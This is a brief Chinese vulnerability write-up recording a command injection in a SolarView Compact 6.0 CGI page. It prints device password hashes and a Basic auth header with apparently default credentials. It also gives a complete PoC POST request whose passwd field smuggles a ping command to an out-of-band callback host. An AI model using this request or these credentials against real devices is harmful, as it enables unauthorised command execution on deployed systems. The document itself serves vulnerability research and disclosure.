之前在 SolarView Compact 6.0 设备上挖了一些漏洞,不过都是PHP页面的,后来发现设备有一些Cgi文件,就看看也没有漏洞,结果真的发现一个,内容较为简单,此文仅作记录。
通过查System函数调用发现的。byte_148D0 值是由51行v2得到的,v2是由 off_12A68得到的。
off_12A68 里面疑似记录是密码内容。
直接访问设备Cgi文件提示401登录认证,根据之前的PHP漏洞获取设备权限,然后查看Web服务组件,发现设备是lighttpd ,根据进程找到lighttpd配置文件,发现记录密码位置。
内容如下,加密方式为 des(unix) 。
admin:OmAOSAs8DVjsc
solar:RdE1VkNO5r4pY
根据cmd5查询得出密码并登录,疑似添加用户页面。
使用Burp抓包,构造PoC进行验证
PoC 请求
POST /cgi-bin/p1_system_user.cgi HTTP/1.1
Host: 110.*.*.*:2080
Content-Length: 103
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Y29udGVj
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://110.*.*.*:20802080/cgi-bin/p1_system_user.cgi
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeuser=11&passwd=11;ping%20-c%205%20cxaqhq.dizl2k6fs5a8lvmczhrl8bzw3n9dx2.oastify.com&button=%C5%D0%CF%BF